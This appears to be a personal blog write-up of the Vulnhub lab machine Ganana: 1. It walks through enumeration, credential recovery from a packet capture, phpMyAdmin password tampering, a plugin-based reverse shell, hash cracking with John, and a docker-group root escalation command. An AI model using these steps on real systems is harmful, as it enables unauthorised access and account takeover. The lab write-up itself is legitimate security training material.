Vulnhub - GANANA: 1 | An ordinary day

Introduction

This is a fairly simple machine rated easy to intermediate. There is only one flag to capture root.txt.

This is Ganana: 1 from vulnhub.

Ports

We have three open ports, and SSH is closed:

22/tcp closed ssh
80/tcp open http
443/tcp open https
6777/tcp open ntz-tracker

Although this says 6777 is ‘ntz-tracker’, a detail scan reveals it is actually FTP:

6777/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230)

FTP

It contains one file:

Hey Welcome to the ORG!!! Hope you have a wonderfull experence working with US!!!

Not helpful.

HTTP/HTTPS

The HTTP and HTTPS versions of the site appear to be the same, so I’ll use them interchangably. There isn’t much on the front page but robots.txt has:

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

And the favicon.ico redirects to http://ganana/wp-includes/images/w-logo-blue-white-bg.png so we appear to have wordpress.

wpscan

root@kali:/opt/vulnhub/ganana# wpscan -e --url http://ganana

This doesn’t give us much - no users, plugins, themes. I don’t try aggressive methods.

Gobuster

Gobuster with a basic wordlist finds lots of things:

root@kali:/opt/vulnhub/ganana# gobuster dir -u http://ganana -w /usr/share/seclists/Discovery/Web-Content/common.txt

eg:

/dashboard            (Status: 302) [Size: 0] [--> http://ganana/secret/?redirect_to=%2Fdashboard]
/embed                (Status: 301) [Size: 0] [--> http://ganana/embed/]
/favicon.ico          (Status: 302) [Size: 0] [--> http://ganana/wp-includes/images/w-logo-blue-white-bg.png]
/feed                 (Status: 301) [Size: 0] [--> http://ganana/feed/]   
/index.php            (Status: 301) [Size: 0] [--> http://ganana/]        
/license              (Status: 200) [Size: 19915]                         
/logout               (Status: 403) [Size: 2787]                          
/lostpassword         (Status: 200) [Size: 10761]

There are some others too; including phpmyadmin - we’ll get to that later - and tasks. There is a /secret, which has the wordpress login. Trying admin:admin prompts the message:

ERROR: I hate bruteforce
2 attempt(s) left

Yikes! Better not bruteforce.

Tasks

At https://ganana/tasks we find a note:

hey Jarret Lee!
Do manage the office as the admin is away for a few weeks!
Admin has created an other temp account for you and details in a pcapng file.

So we better find this file. It only takes a few moments, and we can download it:

root@kali:/opt/vulnhub/ganana# wget http://ganana/jarret.pcapng
--2020-12-22 04:47:29--  http://ganana/jarret.pcapng
Resolving ganana (ganana)... 192.168.1.172
Connecting to ganana (ganana)|192.168.1.172|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 189728 (185K)
Saving to: ‘jarret.pcapng’

jarret.pcapng                     100%[============================================================>] 185.28K  --.-KB/s    in 0.01s   

2020-12-22 04:47:29 (16.8 MB/s) - ‘jarret.pcapng’ saved [189728/189728]

I open it with wireshark and look through. Eventually I find the gold:

log=jarretlee&pwd=NoBrUtEfOrCe__R3Qu1R3d__&redirect_to=http%3A%2F%2F192.168.3.109%2Fwp-admin%2F&testcookie=1HTTP/1.1 200 OK

What can we do with this? Login to wordpress!

WP

Jarret is not an admin :(

He does have a post though, which is called Keep dis SECRET!!!!

QGx3YXlzLUAtU3VwM3ItU2VjdXIzLXBAU1N3MFJkISE

This decodes to:

@lways-@-Sup3r-Secur3-p@SSw0Rd!!

What can we do with this? Try admin again at /secret? Nope - one try left!

phpMyAdmin

We can login to phpMyAdmin as jarretlee with @lways-@-Sup3r-Secur3-p@SSw0Rd!!. Once we’re there we can find there is only one other wordpress user - charleywalker. I have a quick bash at cracking his hash, but it doesn’t work. So I just change it to the same as Jarret’s and go back to wordpress.

Charley

Charley is a wordpress admin. It turns out we have several plugins making things harder:

Loginizer: Loginizer is a WordPress plugin which helps you fight against bruteforce attack by blocking login for the IP after it reaches maximum retries allowed.

Stop User Enumeration: User enumeration is a technique used by hackers to get your login name if you are using permalinks. This plugin stops that.

WPS Hide Login: Protect your website by changing the login URL and preventing access to wp-login.php page and wp-admin directory while not logged-in

Ah well since Charley likes plugins so much we will add one of our own, to get a reverse shell bwahaha! This works, and we’re on.

Shell

We get a shell as daemon to start with,

uid=1(daemon) gid=1(daemon) groups=1(daemon)

But we can su jarretlee with his ‘no bruteforce’ password we retrieved earlier. Once we get there, he has a file called .backups, which is base64 encoded. This contains a hash:

jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1:18430:0:99999:7:::

We can throw this at John and crack it:

root@kali:/opt/vulnhub/ganana# john hash -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hannahmontana    (?)
1g 0:00:00:01 DONE (2020-12-22 05:21) 0.5555g/s 1422p/s 1422c/s 1422C/s skyblue..hassan
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Jeevan

Now we can su jeevan. Jeevan doesn’t have a home directory, but he is a member of the docker group; so that’s our privesc.

jeevan@debian:/home/jarretlee$ cd ~
cd ~
bash: cd: /home/jeevan: No such file or directory
jeevan@debian:/home/jarretlee$ sudo -l
sudo -l
[sudo] password for jeevan: hannahmontana

Sorry, user jeevan may not run sudo on localhost.
jeevan@debian:/home/jarretlee$ groups
groups
jeevan docker
jeevan@debian:/home/jarretlee$ docker run -it -v /:/mnt alpine chroot /mnt
docker run -it -v /:/mnt alpine chroot /mnt
root@8ab8e3461f42:/# cd /root
cd /root
root@8ab8e3461f42:~# ls -lash
ls -lash
total 44K
4.0K drwx------  6    600 root      4.0K Jun 25 06:43 .
4.0K drwxr-xr-x 23    600 root      4.0K Jun 25 04:55 ..
8.0K -rw-------  1 root   root      4.9K Jun 25 07:28 .bash_history
4.0K -rw-r--r--  1 root   root       796 Jun  3  2020 .bashrc
4.0K drwx------  3 root   root      4.0K Jun 25 06:43 .gnupg
4.0K drwxr-xr-x  3 root   root      4.0K Jun  6  2020 .local
4.0K -rw-r--r--  1 root   root       148 Aug 17  2015 .profile
4.0K drwxr-xr-x  3    600 jarretlee 4.0K Jun  7  2020 bitnami
   0 -rw-r--r--  1 root   root         0 Dec 22 09:23 bitnami_credentials
4.0K drwxr-xr-x  2 jeevan jeevan    4.0K Jun 16  2020 jeevan
4.0K -rw-r--r--  1 root   root       501 Jun 17  2020 root.txt
root@8ab8e3461f42:~# cat root.txt
cat root.txt

ASCII ART REMOVED, so you will have to take my word for it.

root@8ab8e3461f42:~#

Rooted, and I didn’t even use linpeas. So yes not complicated but a few steps involved and I quite liked this one. Thumbs up Jeevana Chandra.